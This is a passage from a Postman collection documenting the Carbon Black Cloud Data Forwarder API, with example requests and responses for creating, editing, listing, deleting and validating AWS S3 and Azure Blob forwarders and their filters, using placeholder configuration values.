href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/data-forwarder/api/latest/data-forwarder-api/\">API Documentation</a> on the Developer Network.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"abc92813-4bea-4f2b-a851-97828622d817","name":"Create Forwarder - Endpoint.event","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"type\": \"endpoint.event\",\n  \"name\": \"Event Forwarder Demo\",\n  \"enabled\": false,\n  \"s3_prefix\": \"demo-event\",\n  \"s3_bucket_name\": \"demo-bucket\",\n  \"destination\": \"aws_s3\",\n  \"version_constraint\": \"undefined.*.*\",\n  \"filters\": [\n    {}\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs"},"_postman_previewlanguage":"json","header":[{"key":"Content-Type","value":"application/json","description":""}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"12345678-2272-11ee-8e39-92f206bfcf86\",\n    \"org_key\": \"ABCD1234\",\n    \"name\": \"Event Forwarder Demo\",\n    \"destination\": \"aws_s3\",\n    \"enabled\": false,\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"demo-event\",\n    \"type\": \"endpoint.event\",\n    \"create_time\": \"2023-07-14T18:13:38Z\",\n    \"update_time\": \"2023-07-14T18:13:38Z\"\n}"},{"id":"b622fe04-8591-4dcb-8d78-cad27c6674a8","name":"Create Forwarder - Alert Schema v2.0.0","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"enabled\": false,\n    \"name\": \"Alert Forwarder v2.0.0\",\n    \"destination\": \"aws_s3\",\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"demo-uae\",\n    \"type\": \"alert\",\n    \"version_constraint\": \"2.0.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 14 Jul 2023 17:57:00 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"335"},{"key":"Connection","value":"keep-alive"},{"key":"X-Request-Id","value":"ee482a37-a4ab-4077-94dc-f6e53302f94a"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"12345678-abcd-11ee-8e39-92f206bfcf86\",\n    \"org_key\": \"ABCD1234\",\n    \"name\": \"Alert Forwarder v2.0.0\",\n    \"destination\": \"aws_s3\",\n    \"enabled\": false,\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"uae\",\n    \"type\": \"alert\",\n    \"version_constraint\": \"2.0.0\",\n    \"current_version\": \"2.0.0\",\n    \"create_time\": \"2023-07-14T17:56:59Z\",\n    \"update_time\": \"2023-07-14T17:56:59Z\"\n}"},{"id":"04b63057-9825-43f3-a670-048daa6bf41d","name":"Create Forwarder - Alert Schema v1.0.0, schema version is deprecated","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"enabled\": false,\n    \"name\": \"Alert Forwarder v1.0.0 - the original and deprecated\",\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"demo-pre-uae\",\n    \"type\": \"alert\",\n    \"version_constraint\": \"1.0.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 14 Jul 2023 18:15:35 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"363"},{"key":"Connection","value":"keep-alive"},{"key":"X-Request-Id","value":"dbaff1c8-f79b-4169-be5d-c7e294faf7b5"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"12345678-2272-11ee-a854-429d08efd8d3\",\n    \"org_key\": \"ABCD1234\",\n    \"name\": \"Alert Forwarder v1.0.0 - the original and deprecated\",\n    \"destination\": \"aws_s3\",\n    \"enabled\": false,\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"demo-pre-uae\",\n    \"type\": \"alert\",\n    \"version_constraint\": \"1.0.0\",\n    \"current_version\": \"1.0.0\",\n    \"create_time\": \"2023-07-14T18:15:34Z\",\n    \"update_time\": \"2023-07-14T18:15:34Z\"\n}"},{"id":"5fb56d7e-5657-4f5e-aaa1-242b10dec852","name":"Create Azure Blob Storage Forwarder","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"org_key\": \"ABCD1234\",\n    \"name\": \"Azure Alert Demo\",\n    \"enabled\": false,\n    \"type\": \"alert\",\n    \"version_constraint\": \"2.0.0\",\n    \"destination\": \"azure_blob_storage\",\n    \"azure_storage_account\": \"azuredemo\",\n    \"azure_container_name\": \"azure-event-demo\",\n    \"azure_tenant_id\": \"a12345bc-1abcd-1a2b-a1b2-ab12c3de45f6\",\n    \"azure_client_id\": \"X98766yz-z987-z9x8-z9x8-zx98y7vw65u4\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 12 Jan 2024 23:00:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"85"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Request-Id","value":"aac2b37d-b59b-4c39-94a4-0c63599ffb1d"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"dba5f821-9db9-11ee-a7d0-268d0c3c098b\",\n    \"org_key\": \"ABCD1234\",\n    \"name\": \"Azure Alert Demo\",\n    \"enabled\": false,\n    \"type\": \"alert\",\n    \"version_constraint\": \"2.0.0\",\n    \"current_version\": \"2.0.0\",\n    \"create_time\": \"2023-12-18T15:26:47Z\",\n    \"update_time\": \"2023-12-18T15:26:47Z\",\n    \"destination\": \"azure_blob_storage\",\n    \"azure_storage_account\": \"azuredemo\",\n    \"azure_container_name\": \"azure-event-demo\",\n    \"azure_tenant_id\": \"a12345bc-1abcd-1a2b-a1b2-ab12c3de45f6\",\n    \"azure_client_id\": \"X98766yz-z987-z9x8-z9x8-zx98y7vw65u4\"\n}"}],"_postman_id":"f12c1356-5617-4f16-a85b-d23890edec8f"},{"name":"Forwarder Healthcheck","id":"e466dc7d-bcc9-4c0f-82e0-ab22f95f80d9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}/health_check","description":"<p>This call can be used to run a healthcheck on an Forwarder to determine if the forwarder is able to write to the specified S3 Bucket using the existing configuration. The healthcheck can indicate if the bucket is misconfigured (i.e. incorrect permissions, principle arn, etc.), if the configuration is incorrect (i.e. bucket prefix doesn’t match path specified in policy), or if the forwarder is working as expected. If successful, the healthcheck will attempt to write a test message called <code>healthcheck.json</code> to your S3 bucket under a subfolder called <code>healthcheck</code> and respond with a 200, regardless of whether the API was able to write to the bucket.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}","health_check"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e466dc7d-bcc9-4c0f-82e0-ab22f95f80d9"},{"name":"Get Configured Forwarders","id":"c0ae4a8c-42a1-42ef-bd9c-da302dd6835e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs","description":"<p>Get all configured forwarders and their information.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"02176ea8-85af-4823-ab00-ef9e785acba9","name":"Get Configured Forwarders","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 12 Jan 2024 22:05:36 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1828"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Request-Id","value":"aa670e61-fa8f-42f8-a3c9-41f7d4d0e555"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"id\": \"011b9d03-b12d-11ec-af42-ae26c44461dc\",\n        \"org_key\": \"ABCD1234\",\n        \"name\": \"Event Demo\",\n        \"enabled\": true,\n        \"s3_bucket_name\": \"event-forwarder-demo-bucket\",\n        \"s3_prefix\": \"events\",\n        \"type\": \"endpoint.event\",\n        \"version_constraint\": \"1.*.*\",\n        \"current_version\": \"1.1.0\",\n        \"create_time\": \"2022-03-31T19:58:59Z\",\n        \"update_time\": \"2023-11-16T16:57:27Z\",\n        \"destination\": \"aws_s3\"\n    },\n    {\n        \"id\": \"dba5f821-9db9-11ee-a7d0-268d0c3c098b\",\n        \"org_key\": \"ABCD1234\",\n        \"name\": \"Azure Endpoint.Event Demo\",\n        \"enabled\": false,\n        \"type\": \"endpoint.event\",\n        \"version_constraint\": \"1.0.*\",\n        \"current_version\": \"1.0.0\",\n        \"create_time\": \"2023-12-18T15:26:47Z\",\n        \"update_time\": \"2023-12-18T15:26:47Z\",\n        \"destination\": \"azure_blob_storage\",\n        \"azure_storage_account\": \"azuredemo\",\n        \"azure_container_name\": \"azure-event-dmo\",\n        \"azure_tenant_id\": \"a12345bc-1abcd-1a2b-a1b2-ab12c3de45f6\",\n        \"azure_client_id\": \"X98766yz-z987-z9x8-z9x8-zx98y7vw65u4\"\n    },\n    {\n        \"id\": \"31f827d3-152b-11ee-8d0d-3a23c69b3825\",\n        \"org_key\": \"ABCD1234\",\n        \"name\": \"alert-aws-demo\",\n        \"enabled\": true,\n        \"s3_bucket_name\": \"forwarder-demo\",\n        \"s3_prefix\": \"alert\",\n        \"type\": \"alert\",\n        \"version_constraint\": \"1.0.0\",\n        \"current_version\": \"1.0.0\",\n        \"create_time\": \"2023-06-27T20:42:56Z\",\n        \"update_time\": \"2023-06-28T16:12:45Z\",\n        \"destination\": \"aws_s3\"\n    },\n    {\n        \"id\": \"6a93a655-175e-11ee-8fb0-02f20f8bfd92\",\n        \"org_key\": \"ABCD1234\",\n        \"name\": \"Watchlist Hit Demo\",\n        \"enabled\": true,\n        \"s3_bucket_name\": \"demo-bucket\",\n        \"s3_prefix\": \"watchlisthits\",\n        \"type\": \"watchlist.hit\",\n        \"create_time\": \"2023-06-30T15:54:37Z\",\n        \"update_time\": \"2023-06-30T15:54:37Z\",\n        \"destination\": \"aws_s3\"\n    }\n]"}],"_postman_id":"c0ae4a8c-42a1-42ef-bd9c-da302dd6835e"},{"name":"Get Specific Forwarder","id":"ca603fbc-80e5-4192-9ac7-3f9a0378a0da","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}","description":"<p>Get a specific forwarder's configuration by id.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"ca603fbc-80e5-4192-9ac7-3f9a0378a0da"},{"name":"Edit Forwarder","id":"a19c079a-5d94-4f40-8519-2ef17cc24499","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"enabled\": true,\n    \"name\": \"Alert Forwarder v2.0.0 - the latest and greatest\",\n    \"type\": \"alert\",\n    \"version_constraint\": \"1.0.0\",\n    \"destination\": \"aws_s3\",\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"demo-uae\",\n    \"azure_storage_account\": \"azuredemo\",\n    \"azure_container_name\": \"azure-event-demo\",\n    \"azure_tenant_id\": \"a12345bc-1abcd-1a2b-a1b2-ab12c3de45f6\",\n    \"azure_client_id\": \"X98766yz-z987-z9x8-z9x8-zx98y7vw65u4\"\n}"},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}","description":"<p>This call is used to edit an existing forwarder. The Type (e.g. Alert, Endpoint Event, Watchlist Hit) and Destination<br />(also called Provider, aws_s3 or azure_blob_storage) cannot be changed; all other configuration values can be modified.</p>\n<p>When editing an existing forwarder, the API will make additional calls to check whether the Carbon Black Cloud forwarder can write to the specified destination using the configuration supplied. It will attempt to write a test message called <code>healthcheck.json</code> to the specified bucket under a subfolder called <code>healthcheck</code>, or Azure Container. If the bucket is misconfigured (e.g. incorrect permissions, principle arn, etc.) or the configuration is incorrect (e.g. bucket prefix doesn’t match path specified in policy or bucket does not exist), the Data Forwarder Configuration API will respond with a <code>400</code> and message including information regarding what was incorrect, providing the customer with feedback that enables them to fix issues as needed.</p>\n<p>If you want to remove filters that are applied to your configuration then use the Delete Filter endpoint.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"2ea6b1f9-e471-425d-a116-f84ca0dbf577","name":"Edit Forwarder - AWS S3 Storage","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"enabled\": true,\n    \"name\": \"Alert Forwarder v1.0.0 - the original and deprecated\",\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"demo-alert\",\n    \"type\": \"alert\",\n    \"version_constraint\": \"1.0.0\",\n    \"destination\": \"aws_s3\",\n    \"current_version\": \"1.0.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 14 Jul 2023 18:17:34 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"362"},{"key":"Connection","value":"keep-alive"},{"key":"X-Request-Id","value":"d5516f23-d16f-4d66-94d4-7069add5441a"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"6d34c7d6-2272-11ee-a854-429d08efd8d3\",\n    \"org_key\": \"ABCD1234\",\n    \"name\": \"Alert Forwarder v1.0.0 - the original and deprecated\",\n    \"enabled\": true,\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"demo-alert\",\n    \"type\": \"alert\",\n    \"version_constraint\": \"1.0.0\",\n    \"current_version\": \"1.0.0\",\n    \"create_time\": \"2023-07-14T18:15:34Z\",\n    \"update_time\": \"2023-07-14T18:17:34Z\",\n    \"destination\": \"aws_s3\"\n}\n"},{"id":"964b5020-0bd0-4aab-be38-b6496ca3a7f8","name":"Edit Forwarder - Azure Blob Storage Config","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"enabled\": true,\n    \"version_constraint\": \"2.0.0\",\n    \"name\": \"Azure Alert Demo\",\n    \"destination\": \"azure_blob_storage\",\n    \"current_version\": \"2.0.0\",\n    \"type\": \"alert\",\n    \"azure_storage_account\": \"azuredemo\",\n    \"azure_container_name\": \"azure-event-demo\",\n    \"azure_tenant_id\": \"a12345bc-1abcd-1a2b-a1b2-ab12c3de45f6\",\n    \"azure_client_id\": \"X98766yz-z987-z9x8-z9x8-zx98y7vw65u4\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}"},"status":"Not Found","code":404,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 12 Jan 2024 23:32:57 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"125"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Request-Id","value":"681fc695-e7f2-48af-9c73-f0dbe102e6ef"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"dba5f821-9db9-11ee-a7d0-268d0c3c098b\",\n    \"org_key\": \"ABCD1234\",\n    \"name\": \"Azure Alert Demo\",\n    \"enabled\": false,\n    \"type\": \"alert\",\n    \"version_constraint\": \"2.0.0\",\n    \"current_version\": \"2.0.0\",\n    \"create_time\": \"2023-12-18T15:26:47Z\",\n    \"update_time\": \"2024-01-03T11:43:20Z\",\n    \"destination\": \"azure_blob_storage\",\n    \"azure_storage_account\": \"azuredemo\",\n    \"azure_container_name\": \"azure-event-demo\",\n    \"azure_tenant_id\": \"a12345bc-1abcd-1a2b-a1b2-ab12c3de45f6\",\n    \"azure_client_id\": \"X98766yz-z987-z9x8-z9x8-zx98y7vw65u4\"\n}"},{"id":"04b6605d-f836-4343-a9c3-1d89b12e36b4","name":"Edit Forwarder - Error when both AWS and Azure Configuration is supplied","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"enabled\": true,\n    \"name\": \"Alert Forwarder v2.0.0 - the latest and greatest\",\n    \"type\": \"alert\",\n    \"version_constraint\": \"2.0.0\",\n    \"destination\": \"aws_s3\",\n    \"s3_bucket_name\": \"demo-bucket\",\n    \"s3_prefix\": \"demo-uae\",\n    \"azure_storage_account\": \"azuredemo\",\n    \"azure_container_name\": \"azure-event-demo\",\n    \"azure_tenant_id\": \"a12345bc-1abcd-1a2b-a1b2-ab12c3de45f6\",\n    \"azure_client_id\": \"X98766yz-z987-z9x8-z9x8-zx98y7vw65u4\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 12 Jan 2024 23:51:11 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"166"},{"key":"Connection","value":"keep-alive"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Request-Id","value":"2aab4d00-01b7-4118-9ee6-acf0966c298a"}],"cookie":[],"responseTime":null,"body":"{\n    \"error_code\": \"REQUEST_PRESENT_FIELD_CONDITIONAL\",\n    \"message\": \"azure_client_id cannot be specified when forwarding data to aws_s3\",\n    \"args\": [\n        \"azure_client_id\",\n        \"aws_s3\"\n    ]\n}"}],"_postman_id":"a19c079a-5d94-4f40-8519-2ef17cc24499"},{"name":"Delete Forwarder","id":"cc0153f5-9d0a-481f-afff-08f45ef80eae","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}","description":"<p>Use this call to delete a forwarder.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"cc0153f5-9d0a-481f-afff-08f45ef80eae"},{"name":"Filterable Event Schema","id":"8a7e59ed-882e-4e34-ae7f-5cb9ea24f935","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v2/schemas/events?filterable=true","description":"<p>JSON schema document describing filterable fields, their types, and available enum values</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","schemas","events"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>(Required) required query parameter to get filterable schema</p>\n","type":"text/plain"},"key":"filterable","value":"true"},{"disabled":true,"description":{"content":"<p>When specified, the API will return all filterable fields available for that schema version; if not specified, the API will return all filterable fields for the lowest supported schema version</p>\n","type":"text/plain"},"key":"version_constraint","value":"1.1.0"}],"variable":[]}},"response":[],"_postman_id":"8a7e59ed-882e-4e34-ae7f-5cb9ea24f935"},{"name":"Validate Filter","id":"c4ec9f82-0b60-4ac7-bdb3-9c17fff29271","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"name\": \"Demo filter 1\",\n    \"enabled\": false,\n    \"action\": \"EXCLUDE\",\n    \"query\": \"event_origin:edr AND (process_path:c\\\\:\\\\\\\\windows\\\\\\\\system32\\\\\\\\*) AND type:(endpoint.event.procstart OR endpoint.event.netconn)\",\n    \"version_constraint\": \"1.1.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/validate_filter","description":"<p>Validate whether the filter is valid. If a version constraint is not provided, the lowest version is used.</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"action\": \"&lt;string&gt;\",\n  \"enabled\": &lt;boolean&gt;,\n  \"name\": \"&lt;string&gt;\",\n  \"query\": \"&lt;string&gt;\",\n  \"version_constraint\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/data-forwarder/api/latest/data-forwarder-api/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v2","orgs","{{cb_org_key}}","validate_filter"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a5588e6f-e42b-4353-a078-17fb3d42375d","name":"Validate Filter - Filter is Valid","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"action\": \"INCLUDE\",\n    \"name\": \"type netconn and has protocol\",\n    \"query\": \"type:endpoint.event.netconn AND netconn_application_protocol:TLS OR netconn_application_protocol:HTT\",\n    \"version_constraint\": \"1.1.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/validate_filter"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 23 Feb 2024 21:24:10 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"147"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Request-Id","value":"42de19b2-0aef-4640-a8e1-28127e1724bd"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"\",\n    \"name\": \"type netconn and has protocol\",\n    \"query\": \"type:endpoint.event.netconn AND netconn_application_protocol:TLS OR netconn_application_protocol:HTT\",\n    \"action\": \"INCLUDE\",\n    \"create_time\": \"\",\n    \"update_time\": \"\",\n    \"enabled\": true\n}"},{"id":"b94388e1-ba22-4747-b90d-1c6caa7bfc2f","name":"Validate Filter - Field Not In Schema Version","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"action\": \"INCLUDE\",\n    \"name\": \"type netconn and has protocol\",\n    \"query\": \"type:endpoint.event.netconn AND netconn_application_protocol:TLS OR netconn_application_protocol:HTT\",\n    \"version_constraint\": \"1.0.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/validate_filter"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 23 Feb 2024 21:25:37 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"139"},{"key":"Connection","value":"keep-alive"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Request-Id","value":"ab3397a7-bb9e-40a3-8ed1-1d6151e92fe3"}],"cookie":[],"responseTime":null,"body":"{\n    \"error_code\": 